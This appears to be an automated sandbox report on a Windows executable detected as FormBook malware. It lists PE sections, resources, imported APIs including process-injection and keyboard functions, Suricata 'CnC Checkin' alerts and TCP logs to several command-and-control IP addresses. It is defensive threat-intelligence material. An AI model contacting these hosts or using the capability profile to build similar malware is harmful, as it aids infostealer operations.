                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xc40000x5aee40x5b00020ad2dc6c0173481b1de787fc61fdfb7False0.9277799836881868data7.893856171615236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x11f0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                              RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                              RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                              RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                              RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                              RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                              RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                              RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                              RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                              RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                              RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                              RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                              RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                              RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                              RT_RCDATA0xcc7b80x521e9data1.0003300025865067
                                                                              RT_GROUP_ICON0x11e9a40x76dataEnglishGreat Britain0.6610169491525424
                                                                              RT_GROUP_ICON0x11ea1c0x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0x11ea300x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0x11ea440x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0x11ea580xdcdataEnglishGreat Britain0.6181818181818182
                                                                              RT_MANIFEST0x11eb340x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                              Imports

                                                                              DLLImport
                                                                              WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                              USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                              UxTheme.dllIsThemeActive
                                                                              KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-11-21T12:53:31.929353+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736154.215.72.11080TCP
                                                                              2024-11-21T12:54:05.481825+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449762116.50.37.24480TCP
                                                                              2024-11-21T12:55:28.530745+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44981685.159.66.9380TCP
                                                                              2024-11-21T12:55:43.312625+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44998391.195.240.9480TCP
                                                                              2024-11-21T12:56:06.621580+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001866.29.149.4680TCP
                                                                              2024-11-21T12:56:21.509284+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450022195.110.124.13380TCP
                                                                              2024-11-21T12:56:52.795541+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450026217.196.55.20280TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 21, 2024 12:53:30.209798098 CET4973680192.168.2.4154.215.72.110
                                                                              Nov 21, 2024 12:53:30.329397917 CET8049736154.215.72.110192.168.2.4
                                                                              Nov 21, 2024 12:53:30.329524040 CET4973680192.168.2.4154.215.72.110
                                                                              Nov 21, 2024 12:53:30.340529919 CET4973680192.168.2.4154.215.72.110
                                                                              Nov 21, 2024 12:53:30.461769104 CET8049736154.215.72.110192.168.2.4
                                                                              Nov 21, 2024 12:53:31.927459955 CET8049736154.215.72.110192.168.2.4
                                                                              Nov 21, 2024 12:53:31.928101063 CET8049736154.215.72.110192.168.2.4
                                                                              Nov 21, 2024 12:53:31.929352999 CET4973680192.168.2.4154.215.72.110
                                                                              Nov 21, 2024 12:53:31.930541039 CET4973680192.168.2.4154.215.72.110
                                                                              Nov 21, 2024 12:53:32.050136089 CET8049736154.215.72.110192.168.2.4
                                                                              Nov 21, 2024 12:53:55.899571896 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:56.019675970 CET8049738116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:53:56.019778967 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:56.022408962 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:56.143874884 CET8049738116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:53:57.530338049 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:57.640067101 CET8049738116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:53:57.640094042 CET8049738116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:53:57.640168905 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:57.640202999 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:57.649928093 CET8049738116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:53:57.649972916 CET4973880192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:58.549316883 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:58.669424057 CET8049745116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:53:58.669612885 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:58.672393084 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:53:58.792171955 CET8049745116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:00.186676979 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:00.241486073 CET8049745116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:00.241539955 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:00.241604090 CET8049745116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:00.241651058 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:00.306333065 CET8049745116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:00.306406021 CET4974580192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:01.204654932 CET4975180192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:01.324383020 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.324506044 CET4975180192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:01.326410055 CET4975180192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:01.446130991 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446146011 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446284056 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446295023 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446302891 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446429014 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446439028 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446455956 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:01.446465015 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:02.827543020 CET4975180192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:02.947968006 CET8049751116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:02.948060989 CET4975180192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:03.845762968 CET4976280192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:03.965328932 CET8049762116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:03.965409040 CET4976280192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:03.967367887 CET4976280192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:04.087013960 CET8049762116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:05.481537104 CET8049762116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:05.481621027 CET8049762116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:05.481825113 CET4976280192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:05.485538960 CET4976280192.168.2.4116.50.37.244
                                                                              Nov 21, 2024 12:54:05.605086088 CET8049762116.50.37.244192.168.2.4
                                                                              Nov 21, 2024 12:54:19.116120100 CET4979380192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:19.239120960 CET804979385.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:19.239212036 CET4979380192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:19.241039038 CET4979380192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:19.360594034 CET804979385.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:20.749244928 CET4979380192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:20.869297981 CET804979385.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:20.869373083 CET4979380192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:21.767920017 CET4980080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:21.887551069 CET804980085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:21.887648106 CET4980080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:21.889743090 CET4980080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:22.009234905 CET804980085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:23.406374931 CET4980080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:23.532843113 CET804980085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:23.533011913 CET4980080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:24.424411058 CET4981080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:24.544384003 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.544469118 CET4981080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:24.547323942 CET4981080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:24.668937922 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.668952942 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.668965101 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.668982983 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.669039011 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.669048071 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.669136047 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.669146061 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:24.669204950 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:26.064253092 CET4981080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:26.188844919 CET804981085.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:26.189059973 CET4981080192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:27.083056927 CET4981680192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:27.202827930 CET804981685.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:54:27.203088045 CET4981680192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:27.206227064 CET4981680192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:54:27.325795889 CET804981685.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:55:28.530539036 CET804981685.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:55:28.530695915 CET804981685.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:55:28.530745029 CET4981680192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:55:28.556145906 CET4981680192.168.2.485.159.66.93
                                                                              Nov 21, 2024 12:55:28.839049101 CET804981685.159.66.93192.168.2.4
                                                                              Nov 21, 2024 12:55:33.802694082 CET4996180192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:33.925224066 CET804996191.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:33.925671101 CET4996180192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:33.929876089 CET4996180192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:34.049462080 CET804996191.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:35.249577045 CET804996191.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:35.249766111 CET804996191.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:35.249814987 CET4996180192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:35.436752081 CET4996180192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:36.455219030 CET4996980192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:36.575357914 CET804996991.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:36.575459003 CET4996980192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:36.577708006 CET4996980192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:36.697866917 CET804996991.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:37.945368052 CET804996991.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:37.945430994 CET804996991.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:37.945626974 CET4996980192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:38.095134974 CET4996980192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:39.120584011 CET4997580192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:39.240108013 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.240190983 CET4997580192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:39.244597912 CET4997580192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:39.364460945 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.364501953 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.364531994 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.364583969 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.364612103 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.364641905 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.364674091 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.375669956 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:39.393557072 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:40.519042015 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:40.614703894 CET804997591.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:40.615031004 CET4997580192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:40.749263048 CET4997580192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:41.773659945 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:41.893635988 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:41.894107103 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:41.896395922 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:42.018748999 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312450886 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312478065 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312493086 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312515974 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312531948 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312547922 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312603951 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312619925 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312638044 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312624931 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.312654972 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.312706947 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.312706947 CET4998380192.168.2.491.195.240.94
